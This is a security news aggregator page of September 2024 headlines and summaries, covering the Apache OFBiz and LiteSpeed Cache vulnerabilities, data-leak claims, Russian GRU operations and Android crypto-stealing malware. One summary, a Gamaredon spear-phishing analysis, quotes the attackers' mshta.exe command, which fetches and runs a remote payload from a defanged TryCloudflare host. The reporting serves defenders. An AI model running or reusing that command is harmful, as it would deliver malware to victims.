Server-Side Request Forgery (SSRF), Improper Control of Generation of Code ('Code Injection') vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 18.12.16. Users are recommended to upgrade to version 18.12.16, which fixes the issue.

Security News

The latest news for cybersecurity collected from vast security websites.

grep Has Leaked The Heritage Foundation Database that was Breached by SiegedSec

by Dark Web Informer

This daily article is intended to make it easier for those who want to stay updated with my regular posts. Any subscriber-only content will be clearly marked at the end of the link.

by Dark Web Informer

2024-09-07 21:53:14

XSS Payload List

XSS Payload List

by Dark Web Informer

reconFTW: The Ultimate Tool for Automated Domain Reconnaissance and Vulnerability Scanning

by Dark Web Informer

A Threat Actor Allegedly Has Leaked the Database to Indian Academy of Pediatrics

by Dark Web Informer

Sorillus v7.2: Remote Administration Tool (RAT) Demonstration

by Dark Web Informer

2024-09-07 17:28:54

Ransomware Feed

Ransomware.live provides detailed insights into recent victims, high-profile attacks in the press, ransomware groups, negotiation chats, comprehensive statistics, victims categorized by country, and cartographic visualizations of global incidents.

by Dark Web Informer

888 Has Allegedly Leaked the Muzu.co Database

by Dark Web Informer

A Threat Actor is Allegedly Selling Access to an Unidentified Dutch Company

by Dark Web Informer

U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Draytek VigorConnect and Kingsoft WPS Office bugs to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added Draytek VigorConnect and Kingsoft WPS Office vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog. Below are the descriptions for these vulnerabilities: At the end of August, […]

by Security Affairs

The 6 Different Types of Hackers

by Dark Web Informer

A Threat Actor is Allegedly Selling Singapore Citizens Leads

by Dark Web Informer

A Threat Actor has Allegedly Leaked the Database of SmilePath Australia

by Dark Web Informer

Today''s scams can be as simple as picking up a phone call. To avoid the next fraud, there are good reasons to let your calls run to voicemail. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

Threat actors affiliated with North Korea have been observed leveraging LinkedIn as a way to target developers as part of a fake job recruiting operation. These attacks employ coding tests as a common initial infection vector, Google-owned Mandiant said in a new report about threats faced by the Web3 sector. ""After an initial chat conversation, the attacker sent a ZIP file that contained

by The Hacker News

Two men have been indicted in the U.S. for their alleged involvement in managing a dark web marketplace called WWH Club that specializes in the sale of sensitive personal and financial information. Alex Khodyrev, a 35-year-old Kazakhstan national, and Pavel Kublitskii, a 37-year-old Russian national, have been charged with conspiracy to commit access device fraud and conspiracy to commit wire

by The Hacker News

Plus: Kaspersky’s US business sold, Nigerian sextortion scammers jailed, and Europe’s controversial encryption plans return.

by WIRED Security News

A critical flaw in the LiteSpeed Cache plugin for WordPress could allow unauthenticated users to take control of arbitrary accounts. The LiteSpeed Cache plugin is a popular caching plugin for WordPress that accounts for over 5 million active installations. The plugin offers site acceleration through server-level caching and various optimization features. The LiteSpeed Cache plugin […]

by Security Affairs

The data skills gap is costing businesses significant productivity, with employees losing 26 working days annually, a Multiverse report finds. Companies are prioritizing upskilling efforts to bridge this gap and improve data competency.

by ITPro Today

The United States Attorney for the Southern District of New York announced the unsealing of a three-count criminal indictment against Michael Smith, a North Carolina musician. The indictment charged Smith with wire fraud, wire fraud conspiracy, and money laundering conspiracy for allegedly using artificial intelligence (AI) tools and thousands of bots to fraudulently stream songs billions of times to obtain more than $10 million in undeserved royalty payments. Michael Smith Exploited AI-Generated Songs According to the unsealed indictment, 52-year-old Michael Smith used hundreds of thousands of AI-generated songs to manipulate streaming numbers across various music streaming platforms, such as Amazon Music, Apple Music, Spotify, and YouTube Music, to continuously stream the AI-generated songs. He partnered with the CEO of an unnamed AI music company, who supplied him with thousands of tracks per month in exchange for a cut of the streaming revenue. Smith then deployed thousands of automated bot accounts to continuously stream these AI-generated songs, avoiding detection and claiming over $10 million in royalty payments. The songs were given randomly generated names and artist identities to make them appear as if they were created by real artists, rather than AI. Smith has been charged with wire fraud conspiracy, wire fraud, and money laundering conspiracy, each of which carries a maximum sentence of 20 years in prison. The case is being prosecuted by the Office''s Complex Frauds and Cybercrime Unit, and the FBI has praised the work of the investigators in uncovering this sophisticated scheme. Crackdown on Fraudulent Streaming Practices The case against Michael Smith is part of a broader effort by authorities to combat the growing problem of fraudulent streaming practices. Earlier this year, a man in Denmark was sentenced to 18 months in prison for a similar scheme. Music streaming platforms, such as Spotify, Apple Music, and YouTube, have also taken steps to address the issue, including changes to their royalty policies and increased efforts to detect and prevent artificial stream inflation. The music industry has seen a growing backlash, with artists signing open letters calling for the end of the predatory use of AI in the industry. The charges against Michael Smith represent a significant step in the fight against the misuse of AI technology in the music industry. As the case unfolds, it will likely have far-reaching implications, serving as a warning to those who seek to exploit the system and a call to action for the industry to address the challenges posed by the rise of AI-generated music. The outcome of this case will be closely watched as the music industry and streaming platforms navigate the complex landscape of recent technological advancements.

by The Cyber Express

Pavel Durov, a Russian-born billionaire and the founder of Telegram, has issued public statements for the first time since his detention in France last month, denying claims that the messaging app functions as an ''anarchic paradise'' for cybercriminal activity. Durov was arrested amid an investigation into crimes related to child sexual abuse images, drug trafficking, and fraudulent transactions associated with the app. However, he has also pledged to overhaul the platform''s much-criticized moderation policies. Pavel Durov''s Detention for Telegram Related Charges Durov, who holds French citizenship, was detained in late August amid an investigation into alleged crimes on Telegram. While he managed to avoid jail time, Durov was released on a €5 million bail and ordered to report to police twice a week while remaining in France. Durov has since then criticized the decision of the French authorities to detain him, believing that they should have approached the company with these complaints rather than charging him personally. He argues that using laws from the pre-smartphone era to charge a CEO with crimes committed by third parties on the platform is a misguided approach. Durov pointed out that Telegram has an official representative for the EU region to accept and reply to requests, and that the French authorities had access to a hot line he had helped set up. He believes that the established standard practice is to start a legal action against the service itself, rather than targeting the CEO. In a lengthy statement posted to his Telegram channel early Friday, Durov acknowledged that the platform has struggled to keep pace with its rapid growth, which has reached nearly 1 billion users, making it easier for criminals to exploit its services. While 99.999% of Telegram users have nothing to do with crime, the 0.001% involved in illicit activities create a bad image for the entire platform, putting the interests of our almost billion users at risk,"" Durov wrote. Telegram''s Principles and Moderation Efforts Despite the criminal charges he faces, Durov defended Telegram''s principles and its commitment to user privacy. He said the platform has consistently refused to comply with demands from authoritarian governments, such as when it refused to hand over encryption keys to enable surveillance in Russia, leading to a ban from the Russian government. ""We are prepared to leave markets that aren''t compatible with our principles, because we are not doing this for money,"" Durov wrote. ""We are driven by the intention to bring good and defend the basic rights of people, particularly in places where these rights are violated,"" he added. Durov acknowledged that Telegram is not perfect and said the platform should improve its processes for handling law enforcement requests, mentioning that the platform removes millions of harmful posts and channels every day. ""We''ve already started that process internally, and I will share more details on our progress with you very soon,"" he added. He has pledged to revamp the company''s moderation policies, including removing features linked to illegal activity. The company has already taken steps to address these issues, including disabling new media uploads to its blogging tool Telegraph and removing its People Nearby feature. Despite the challenges, Durov expressed optimism that the recent events would ultimately strengthen Telegram and the social media industry as a whole. ""I hope that the events of August will result in making Telegram — and the social networking industry as a whole — safer and stronger,"" he expressed.

by The Cyber Express

This daily article is intended to make it easier for those who want to stay updated with my regular posts. Any subscriber-only content will be clearly marked at the end of the link.

by Dark Web Informer

Alleged Data Leak of Tourism Authority of Thailand

by Dark Web Informer

natohub has Allegedly Leaked Data Belonging to Euraxess Europe

by Dark Web Informer

A first in our telemetry: Chinese APT Stately Taurus uses Visual Studio Code to maintain a reverse shell in victims'' environments for Southeast Asian espionage. The post Chinese APT Abuses VSCode to Target Government in Asia appeared first on Unit 42.

by Palo Alto Networks - Unit42

Car rental giant Avis disclosed a data breach that impacted one of its business applications in August compromising customers’ personal information. Car rental company Avis notified customers impacted in an Augus data breach. Threat actors breached one of its business applications and gained access to some of the customers’ personal information. “We discovered on August […]

by Security Affairs

SonicWall has revealed that a recently patched critical security flaw impacting SonicOS may have come under active exploitation, making it essential that users apply the patches as soon as possible. The vulnerability, tracked as CVE-2024-40766, carries a CVSS score of 9.3 out of a maximum of 10. ""An improper access control vulnerability has been identified in the SonicWall SonicOS management

by The Hacker News

A critical GeoServer vulnerability (CVE-2024-36401) is being actively exploited, allowing attackers to take control of systems for malware…

by Hackread

A recently disclosed security flaw in OSGeo GeoServer GeoTools has been exploited as part of multiple campaigns to deliver cryptocurrency miners, botnet malware such as Condi and JenX, and a known backdoor called SideWalk. The security vulnerability is a critical remote code execution bug (CVE-2024-36401, CVSS score: 9.8) that could allow malicious actors to take over susceptible instances. In

by The Hacker News

Threat actors have long leveraged typosquatting as a means to trick unsuspecting users into visiting malicious websites or downloading booby-trapped software and packages. These attacks typically involve registering domains or packages with names slightly altered from their legitimate counterparts (e.g., goog1e.com vs. google.com). Adversaries targeting open-source repositories across

by The Hacker News

Analysis of a new phishing attack demonstrates how attackers may take a longer path to reach their malicious goals while staying “under the radar” of security products.

by KnowBe4

Learn about Mitiga’s fully-managed cloud detection and response service that operates 24/7.

by Mitiga

In the ever-evolving field of information security, curiosity and continuous learning drive innovation. 

by SpiderLabs Blog

In the past, Putin''s Unit 29155 has utilized malware like WhisperGate to target organizations, particularly those in Ukraine.

by Dark Reading

The vulnerabilities affect industrial control tech used across the healthcare and critical manufacturing sectors.

by Dark Reading

Vendors of mercenary spyware tools used by nation-states to track citizens and enemies have gotten savvy about evading efforts to limit their use.

by Dark Reading

Recently fixed access control SonicOS vulnerability, tracked as CVE-2024-40766, is potentially exploited in attacks in the wild, SonicWall warns. SonicWall warns that a recently fixed access control flaw, tracked as CVE-2024-40766 (CVSS v3 score: 9.3), in SonicOS is now potentially exploited in attacks. “An improper access control vulnerability has been identified in the SonicWall SonicOS management […]

by Security Affairs

A misconfigured server from a US-based AI healthcare firm Confidant Health exposed 5.3 TB of sensitive mental health…

by Hackread

The US government will remove ""unnecessary degree requirements"" in favor of skills-based hiring to help fill 500,000 open cybersecurity jobs. The post US Gov Removing Four-Year-Degree Requirements for Cyber Jobs appeared first on SecurityWeek.

by SecurityWeek

Trend Micro has uncovered a new threat group, dubbed TIDRONE, targeting Taiwan''s military and satellite industries, with a specific focus on drone manufacturers. This campaign employs advanced malware and espionage tactics, likely linked to a Chinese-speaking cyber espionage group. The TIDRONE campaign, active since early 2024, is suspected to be a supply chain attack, leveraging … The post TIDRONE Espionage Group Targets Taiwan’s Military Drone Industry appeared first on CyberInsider.

by Cyber Insider

Kaspersky customers in the US can continue their existing subscriptions with a replacement product from the company''s ''trusted partner''. Here''s what to know.

by ZDNET Security

The Biden administration launches an initiative to encourage careers in cybersecurity, as businesses try new tactics to get unfilled IT security roles staffed.

by Dark Reading

An advisory for 18 patched flaws includes one that could enable “full system takeover,” researchers said.

by SC Media

2024-09-06 16:00:00

IP Addresses - SWN Vault

by SC Media

The company’s framing of AI personas offers a roadmap for nudging workers along to where managers want them to go in using new technologies.

by ITPro Today

​Transport for London, the city''s public transportation agency, revealed today that its staff has limited access to systems and email due to measures implemented in response to a Sunday cyberattack. [...]

by BleepingComputer

As many as 240 million Windows 10 PCs can''t be upgraded to Windows 11. Instead of tossing your device when Windows 10 support runs out, here are five viable alternatives to save you money and avoid headaches.

by ZDNET Security

In August, Lowe''s employees were the subject of a targeted campaign using fake ads and websites.

by ThreatDown

On September 5th, 2024, the Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and National Security Agency (NSA) released a joint advisory about the cyber activities of a Russian cyber unit known as GRU Unit 29155 (161st Specialist Training Center) [1]. This group, part of the Russian military, has conducted espionage, sabotage, and reputational harm campaigns against various global targets since 2020. These operations focused on critical infrastructure, aim to destabilize regions, disrupt services, and steal sensitive information, mainly through their highly associated and destructive malware, such as WhisperGate.

by Picus Security

The 2024 State of the vCISO Report continues Cynomi’s tradition of examining the growing popularity of virtual Chief Information Security Officer (vCISO) services. According to the independent survey, the demand for these services is increasing, with both providers and clients reaping the rewards. The upward trend is set to continue, with even faster growth expected in the future. However,

by The Hacker News

In a brief update ahead of the weekend, the London transport network said it has no evidence yet that customer data was compromised. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

While AI has huge potential to mitigate the environmental crisis, the technology that powers AI has a huge impact on climate change and water resources. Learn how the futures of AI and the green market revolution are intimately linked and how they will both become invisibly embedded into our daily lives.

by ITPro Today

by Mike Saunders, Principal Consultant     This blog is the twelfth in a series of blogs on obfuscation techniques for hiding shellcode. You can find the rest of the […]

by Red Siege Blog

The funds from Germany’s Sovereign Tech Fund will be used to integrate security features such as zero trust capabilities and tools for software bill of materials.

by Dark Reading

The WDTA framework spans the lifecycle of large language models, offering guidelines to manage integration with other systems.

by ZDNET Security

Security pros say this flaw could be integrated into a botnet, so teams should patch immediately.

by SC Media

American car rental giant Avis disclosed a data breach after attackers breached one of its business applications last month and stole customer personal information. [...]

by BleepingComputer

No organization can single-handedly defend against sophisticated attacks. Governments and private sector entities need to collaborate, share information, and develop defenses against cyber threats

by Dark Reading

The US Department of Justice has named five Russian computer hackers as members of Unit 29155 – i.e., the 161st Specialist Training Center of the Russian General Staff Main Intelligence Directorate (GRU) – which they deem resposible for the 2022 WhisperGate wiper malware attacks on Ukrainian government organizations and critical infrastructure, and subsequently computer network operations against NATO member and ally countries. “Since early 2022, the primary focus of the cyber actors appears to be … More → The post Exposed: Russian military Unit 29155 does digital sabotage, espionage appeared first on Help Net Security.

by Help Net Security

SonicWall is warning customers that the recently patched critical vulnerability CVE-2024-40766 may be exploited in the wild. The post Recent SonicWall Firewall Vulnerability Potentially Exploited in the Wild appeared first on SecurityWeek.

by SecurityWeek

DoJ seizes 32 Doppelgänger domains, Veeam releases fix for critical RCE flaw in backup product, and DPRK attackers exploit Chromium zero-day. The post The Good, the Bad and the Ugly in Cybersecurity – Week 36 appeared first on SentinelOne.

by SentinelOne

With the adoption of artificial intelligence (AI) soaring across industries and use cases, preventing AI-driven software supply chain attacks has never been more important. Recent research by SentinelOne exposed a new ransomware actor, dubbed NullBulge, which targets software supply chains by weaponizing code in open-source repositories like Hugging Face and GitHub. The group, claiming to […] The post How cyber criminals are compromising AI software supply chains appeared first on Security Intelligence.

by Security Intelligence

The spy agency that dared not speak its name is now the Joe Rogan of the SIGINT set. And the pod''s actually worth a listen.

by WIRED Security News

Talos'' Nick Biasini discusses the biggest shifts and trends in the threat landscape so far. We also focus on one state sponsored actor that has been particularly active this year, and talk about why defenders need to be paying closer attention to infostealers.

by Cisco Talos Blog

Noteworthy stories that might have slipped under the radar: US Special Forces can hack buildings, X is hiring cybersecurity staff, and FTC warns of Bitcoin ATM scams.  The post In Other News: US Army Hacks Buildings, X Hiring Cybersecurity Staff, Bitcoin ATM Scams appeared first on SecurityWeek.

by SecurityWeek

The decentralized finance (DeFi) ecosystem has been rocked by another major security breach. Penpie, a protocol built on the Pendle platform, suffered a hack on September 3, 2024. The protocol informed that the breach resulted in the theft of approximately $27 million worth of cryptocurrency. This Penpie Defi Hack adds to the already concerning rise in crypto scams, pushing total losses for 2024 past the staggering $1.2 billion mark. Details of the Penpie DeFi Hack The Penpie post-mortem report sheds light on some specifics of the exploit. It reveals that the attacker leveraged a vulnerability in Penpie''s reward distribution mechanism. This vulnerability allowed the attacker to deploy a malicious smart contract, categorized as an ""evil market,"" that inflated the attacker''s staking balance on the platform. By manipulating this balance, the attacker could claim a significantly larger share of rewards than intended, ultimately draining millions of dollars worth of crypto assets. Following the hack, the blockchain suspended all deposits and withdrawals, effectively halting operations to prevent further losses. The team also filed complaints with both the Singapore police and the FBI. They also sent a message to the hacker promising a negotiated bounty payment in exchange for the safe return of funds. “We acknowledge your exploit of our protocol,” they wrote. “Please contact us to discuss terms confidentially. No legal action will be pursued if the funds are returned. Let’s find a mutually beneficial solution.” [caption id=""attachment_89338"" align=""alignnone"" width=""738""] Penpie''s Appeal to Hacker. Source: X[/caption] Euler Finance Cybercriminal Lauds Penpie Hacker Soon after the incident, reports emerged that the Penpie hacker quickly moved a significant portion of the stolen funds – around $7 million – through the crypto mixer Tornado Cash. These mixers are designed to obfuscate the origin and destination of cryptocurrency transactions, making them a popular tool for criminals seeking to launder ill-gotten gains. Following the crypto hack, another infamous Euler Finance hacker, responsible for a $195 million DeFi heist in 2023, left on the blockchain. The message, directed at the Penpie hacker, expressed praise for their decision not to return the stolen funds. “Good job bro. I didn’t see a hack like this for a while. I’m happy you kept all the money and didn’t let these bastards get back one dollar of what you took. You won, they lost. Good job,” they wrote. [caption id=""attachment_89339"" align=""alignnone"" width=""1338""] Cybercriminal Lauds Penpie Hacker. Source: X[/caption] Over 9,000 Victims in August Due to Cyrpto Phishing Scams: Report Unfortunately, the Penpie incident is just one in a series of major DeFi hacks in 2024. The cryptocurrency landscape continues to be plagued by cyberattacks, with the total value of stolen funds in 2024 surpassing $1.21 billion. This represents a 15.5% increase compared to the previous year, according to a report by Immunfi. The losses are spread across 154 separate incidents, with the majority occurring in the DeFi space. August 2024 was particularly alarming for crypto investors, as hackers exploited various vulnerabilities to steal millions of dollars. Two major attacks during this period resulted in the theft of approximately $238 million in Bitcoin and $55 million in Dai. [caption id=""attachment_89341"" align=""alignnone"" width=""900""] Source: Scam Sniffer Report[/caption] Phishing scams also saw a significant surge in August, with Scam Sniffer reporting a 215% increase in stolen funds compared to the previous month. Over 9,000 victims fell prey to these scams, losing about $63 million. A single large-scale phishing attack accounted for the majority of these losses, with approximately $55 million stolen. Regulation and the Future of DeFi The increasing frequency of DeFi hacks has also sparked discussions surrounding potential regulations. While some advocate for a more hands-on approach from regulatory bodies, others argue that such measures may stifle innovation and the core principles of DeFi. Finding the right balance between security and innovation remains a challenge. However, it''s clear that addressing security vulnerabilities will be essential for fostering long-term trust and stability in the DeFi ecosystem.

by The Cyber Express

​After Office 2024 launches in October, Microsoft will disable ActiveX controls by default in Word, Excel, PowerPoint, and Visio client apps. [...]

by BleepingComputer

Cybersecurity researchers have discovered yet another critical security flaw in the LiteSpeed Cache plugin for WordPress that could allow unauthenticated users to take control of arbitrary accounts. The vulnerability, tracked as CVE-2024-44000 (CVSS score: 7.5), impacts versions before and including 6.4.1. It has been addressed in version 6.5.0.1.  ""The plugin suffers from an

by The Hacker News

We explore the opportunities and limitations of automated security assurance by taking a close look at GCP and Azure cloud reports for ISO 27001.

by ITPro Today

Modern browsers and web servers support many HTTP headers that can greatly improve web application security to protect against clickjacking, cross-site scripting, and other common types of attacks. This post provides an overview of best-practice HTTP security headers that you should be setting in your websites and applications and shows how to use DAST to make sure you’re doing it right. The post HTTP security headers: An easy way to harden your web applications appeared first on Invicti.

by Invicti

In 2020, according to population estimates from the U.S. Census Bureau, millennials surpassed Baby Boomers as the nation’s largest living adult generation. Millennials were heralded as digital natives, the first generation to grow up immersed in the digital world of the internet, smartphones, and social media. This has fundamentally shaped their communication, work habits, and lifestyles […] The post Gen Alpha: Navigating Cybersecurity in an AI-Native World appeared first on IT Security Guru.

by IT Security Guru

The latest Apache OFBiz update patches CVE-2024-45195, a bypass of a recently disclosed remote code execution bug exploited in attacks. The post Apache Makes Another Attempt at Patching Exploited RCE in OFBiz appeared first on SecurityWeek.

by SecurityWeek

A newly discovered Android malware named ‘SpyAgent'' is stealing sensitive cryptocurrency credentials using advanced image recognition technology. The malware, discovered by McAfee''s Mobile Research Team, targets mnemonic keys used to recover crypto wallets by scanning images on infected devices. These 12-word phrases serve as a more user-friendly alternative to traditional, complex private keys, making their … The post New Android Malware SpyAgent Targets Crypto Wallets with Image Recognition appeared first on CyberInsider.

by Cyber Insider

Responding to the feedback we’ve received from our 2.9 million community of cybersecurity professionals, we’re excited to share the new Hack The Box updates released over the past 3 months.

by Hack The Box Blog

Attackers operating under the direction of Russia’s military intelligence service are targeting governments, finance, transportation, energy and healthcare.

by Cybersecurity Dive

Roundup of the three dozen cybersecurity-related merger and acquisition (M&A) deals announced in August 2024. The post Cybersecurity M&A Roundup: 36 Deals Announced in August 2024 appeared first on SecurityWeek.

by SecurityWeek

A new Android malware named SpyAgent uses optical character recognition (OCR) technology to steal cryptocurrency wallet recovery phrases from screenshots stored on the mobile device. [...]

by BleepingComputer

A sophisticated spear-phishing campaign orchestrated by the Gamaredon APT group has emerged as a threat to Ukrainian military personnel. Cyble Research and Intelligence Labs (CRIL) has revealed this extensive operation, which capitalizes on spear-phishing emails to compromise sensitive military systems. Gamaredon, also known as Primitive Bear or Armageddon, is a Russian-affiliated Advanced Persistent Threat (APT) group with a long history of targeting Ukrainian government institutions and critical infrastructure. Active since at least 2013, Gamaredon has been notorious for its cyber-espionage activities. Despite the relatively low sophistication of their tools, the group''s persistent focus on specific geopolitical targets has led to numerous successful attacks. An Overview of the Gamaredon Campaign The latest campaign by Gamaredon reflects an escalation in their tactics and scope. CRIL’s recent analysis reveals that the group is employing spear-phishing emails to deliver malicious payloads aimed at Ukrainian military personnel. This campaign leverages spear-phishing emails to distribute harmful content, demonstrating a clear pattern of coordinated and large-scale cyberattacks. [caption id=""attachment_89329"" align=""alignnone"" width=""1024""] Gamaredon Sample Observed in the Wild (Source: Cyble)[/caption] The spear-phishing emails at the heart of this Gamaredon campaign are designed to deceive recipients into executing malicious files. The emails are themed around military summons, with subjects such as “ПОВІСТКА” (which translates to ""summons""). Each email contains a malicious XHTML attachment, crafted to initiate a series of damaging actions when opened. Upon activation, the XHTML file executes obfuscated JavaScript code. This script, hidden within a div element with an id set to “jwu,” utilizes Base64 encoding and random characters to obscure its true intent. The obfuscation is a deliberate tactic to evade detection by security systems. The JavaScript code runs silently, downloading a RAR compressed folder into the victim’s Downloads directory. This folder is designed to appear as a legitimate file, further tricking the user. The downloaded RAR file contains a Windows shortcut (LNK) file. When executed, this shortcut initiates the running of a remote .tar archive. The Gamaredon group has employed TryCloudflare’s one-time tunnel feature to host these malicious files. By leveraging TryCloudflare, the attackers can use a temporary, anonymous tunnel to access resources and deploy their payloads without traditional detection methods. The specific command executed by the LNK file is: “C:\Windows\System32\mshta.exe hxxps://jurisdiction-xhtml-peace-surrey[.]trycloudflare.com/tcg/instruct/instructor.tar /f” This command directs the system to retrieve and run the malicious .tar file from the TryCloudflare domain. The Gamaredon Campaign''s Scale and Impact The ongoing Gamaredon campaign is notable for its large-scale and sophisticated execution. The frequency and volume of spear-phishing emails indicate a highly coordinated effort. The use of TryCloudflare’s one-time tunnel feature highlights the group''s ingenuity in circumventing traditional cybersecurity measures. A key component of this campaign is the inclusion of a 1-pixel remote image within the malicious files. This image acts as a tracking mechanism, allowing the attackers to monitor interactions with their phishing content and gauge the effectiveness of their attacks. While CRIL’s investigation was unable to retrieve the contents of the .tar files, analyses from other cybersecurity experts, such as Cisco Talos, suggest that these archives likely contain additional malicious payloads designed to exfiltrate sensitive information from compromised systems. Implications for Cybersecurity and Recommendations To counteract sophisticated spear-phishing attacks, organizations, particularly those in sensitive sectors like the military, must adopt comprehensive cybersecurity strategies. First, user training is essential. Educating users on how to recognize spear-phishing attempts, especially those involving unexpected military-themed attachments or messages, is crucial. Awareness plays a significant role in reducing the success rate of such attacks. Advanced email security is another critical component. Implementing email security solutions with advanced threat protection capabilities helps filter out phishing emails and malicious attachments effectively. In addition, deploying robust anti-malware solutions is necessary. These tools should be capable of detecting and blocking obfuscated JavaScript code and malicious LNK files. Regular updates and scans are essential for maintaining protection against online threats. Network monitoring is also vital. Keeping an eye out for unusual network activity, such as connections to TryCloudflare’s one-time tunnels or other unknown external resources, helps in the early detection of anomalies, which can prevent further infiltration. Application whitelisting should be used to allow only trusted applications and scripts to run on systems. This measure helps prevent the unauthorized execution of potentially harmful files. Lastly, leveraging threat intelligence platforms is important for blocking known malicious domains, including those abused by groups like Gamaredon. Staying updated with the latest threat intelligence provides an edge in preemptively countering cyberattacks. The Gamaredon campaign represents a significant escalation in cyber threats targeting Ukrainian military personnel. Through the use of spear-phishing emails, malicious XHTML attachments, and advanced evasion techniques like TryCloudflare’s one-time tunnel feature, Gamaredon continues to refine and intensify its attacks. The persistence and scale of this campaign highlight the importance of maintaining vigilant and proactive cybersecurity measures.

by The Cyber Express

Sophos X-Ops explores the distribution and capabilities of the Atomic macOS Stealer (AMOS)

by Sophos News

Upgrade your security with 1Password, a premium password manager with useful features.

by ZDNET Security

Learn how to create a PowerShell script that can listen to your voice and respond with spoken words.

by ITPro Today

Marsh McLennan and Zurich Insurance Group issued a white paper urging a public-private partnership to help tackle a growing coverage gap. The White House is working on a plan. 

by Cybersecurity Dive

Veeam has released patches for critical-severity vulnerabilities in Backup & Replication, ONE, and Service Provider Console. The post Veeam Patches Critical Vulnerabilities in Enterprise Products appeared first on SecurityWeek.

by SecurityWeek

A new security flaw has been addressed in the Apache OFBiz open-source enterprise resource planning (ERP) system that, if successfully exploited, could lead to unauthenticated remote code execution on Linux and Windows. The high-severity vulnerability, tracked as CVE-2024-45195 (CVSS score: 7.5), affects all versions of the software before 18.12.16. ""An attacker with no valid

by The Hacker News

Video and audio of therapy sessions, transcripts, and other patient records were accidentally exposed in a publicly accessible database operated by the virtual medical company Confidant Health.

by WIRED Security News

A vulnerability in the LiteSpeed Cache WordPress plugin leads to the exposure of sensitive information, including user cookies. The post LiteSpeed Cache Plugin Vulnerability Exposes Millions of WordPress Sites to Attacks appeared first on SecurityWeek.

by SecurityWeek

Popular open-source enterprise Resource Planning (ERP) system, Apache OFBiz, recently discovered harboring a critical Remote Code Execution (RCE) vulnerability. Tracked as CVE-2024-45195, the Apache OFBiz vulnerability could allow attackers to execute arbitrary code on vulnerable Linux and Windows servers running OFBiz. Thankfully, the Apache security team has addressed the issue in the latest update, urging users to patch their installations immediately. Understanding the Apache OfBiz RCE Vulnerability (CVE-2024-45195) The vulnerability, discovered by Rapid7 security researchers, stems from missing authorization checks within the OFBizEweb application. This weakness, categorized as a forced browsing vulnerability, exposes restricted paths to unauthenticated direct request attacks. ""An attacker with no valid credentials can exploit missing view authorization checks in the web application to execute arbitrary code on the server,"" 1 explained security researcher Ryan Emmons in a report. In simpler terms, an attacker could potentially exploit this vulnerability by crafting a specially designed URL that bypasses authentication protocols. If successful, this could grant the attacker the ability to execute malicious code on the server, potentially leading to complete system compromise. Potential Consequences of the Exploit The consequences of exploiting CVE-2024-45195 could be severe for organizations relying on OFBiz. Here are some potential risks: Data Theft and Leakage: Attackers could gain access to sensitive information stored on the server, including customer data, financial records, and intellectual property. Disruption of Operations: The execution of malicious code could disrupt critical business processes, leading to downtime and financial losses. Lateral Movement and Persistence: Exploiting this vulnerability could be a stepping stone for attackers to gain a foothold in the network and launch further attacks within the system. Apache Patches Flaw The Apache Software Foundation (ASF) has released a patch (version 18.12.16) that addresses CVE-2024-45195. This update strengthens the authorization checks within the OFBiz application, preventing unauthorized access to restricted paths. Emmons explained that CVE-2024-45195 patch is a bypass for three other OFBiz vulnerabilities that have been addressed in the past few months and are tracked as CVE-2024-32113, CVE-2024-36104, and CVE-2024-38856. CVE-2024-32113 had been exploited in attacks using the Mirai botnet, highlighting the serious risks associated with such flaws. Meanwhile, CVE-2024-38856 was rated with a CVSS score of 9.8 by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) , classifying it as critical in severity. The vulnerability allowed attackers to execute remote code without prior authentication, posing a severe risk to affected systems. Based on our analysis, three of these vulnerabilities are, essentially, the same vulnerability with the same root cause,"" Emmons said. All of them are caused by a controller-view map fragmentation issue that enables attackers to execute code or SQL queries and achieve remote code execution sans authentication. The latest patch put in place ""validates that a view should permit anonymous access if a user is unauthenticated, rather than performing authorization checks purely based on the target controller."" Importance of Security in Open-Source Software The discovery of CVE-2024-45195 serves as a reminder of the importance of security in open-source software. While open-source tools offer numerous benefits, they also require consistent vigilance and patching to address vulnerabilities promptly. Users are responsible for keeping their deployments up-to-date and implementing additional security measures to mitigate risks. The patching of CVE-2024-45195 is a positive step forward, but it''s vital to remain vigilant. The ever-evolving cyber threat landscape necessitates continuous monitoring and proactive security measures. By implementing a comprehensive security strategy, organizations using OFBiz can minimize their attack surface and safeguard their critical data.

by The Cyber Express

For the fourth time in the last five months, Apache OFBiz users have been advised to upgrade their installations to fix a critical flaw (CVE-2024-45195) that could lead to unauthenticated remote code execution. About CVE-2024-45195 Apache OFBiz is an open-source suite for enterprise resource planning (ERP), which contains web applications for human resources management, customer relationship management, accounting, marketing, etc. “Apache OFBiz is used by numerous large organizations, and previously disclosed vulnerabilities for it have … More → The post Apache OFBiz team patches critical RCE vulnerability (CVE-2024-45195) appeared first on Help Net Security.

by Help Net Security

While this issue was disclosed and patched in the V8 engine in June 2023, the WeChat Webview component was not updated, and still remained vulnerable when Talos reported it to the vendor.

by Cisco Talos Blog

Effective DevOps infrastructure management is key to accelerating development cycles, enhancing collaboration, and maintaining security while aligning with organizational goals and customer needs.

by ITPro Today

Ongoing gaps in the U.S. cybersecurity workforce that have left nearly half a million jobs unfilled have prompted the Office of the National Cyber Director to introduce the new Service for America cyber hiring sprint that would link jobseekers to cyber jobs within the next two months.

by SC Media

Researchers and the TSA have different views on the impact of vulnerabilities in an airport security application that could allegedly allow the bypass of certain airport security systems. The post CISA Breaks Silence on Controversial ‘Airport Security Bypass’ Vulnerability  appeared first on SecurityWeek.

by SecurityWeek

Zero-trust implementation has been 87% completed across federal agencies on average ahead of the September 30 deadline.

by SC Media

Such a vulnerability evades fixes issued for previous OFBiz bugs, tracked as CVE-2024-38856, CVE-2024-36104, and CVE-2024-32113, all of which have resulted from a fragmentation issue within the controller-view map that could allow unauthenticated remote code or SQL query execution, according to Rapid7 security researchers.

by SC Media

Telegram CEO Pavel Durov has broken his silence nearly two weeks after his arrest in France, stating the charges are misguided. ""If a country is unhappy with an internet service, the established practice is to start a legal action against the service itself,"" Durov said in a 600-word statement on his Telegram account. ""Using laws from the pre-smartphone era to charge a CEO with crimes committed

by The Hacker News

Exploitation of the flaw, which stems from LiteSpeed Cache''s debug logging functionality, could be conducted by attackers with ''/wp-content/debug.log'' file access to exfiltrate users'' session cookies, spoof admin users, and takeover websites.

by SC Media

